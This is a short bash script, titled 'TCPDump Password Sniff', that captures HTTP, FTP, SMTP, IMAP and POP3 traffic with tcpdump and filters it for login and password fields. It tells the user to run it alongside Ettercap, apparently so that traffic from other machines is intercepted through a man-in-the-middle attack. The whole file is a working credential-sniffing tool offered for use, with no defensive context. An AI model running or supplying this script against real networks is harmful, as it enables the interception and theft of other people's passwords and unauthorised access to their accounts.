#!/bin/bash

echo "TCPDump Password Sniff"
echo "WARNING: Run with Ettercap"
sudo tcpdump -vv port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

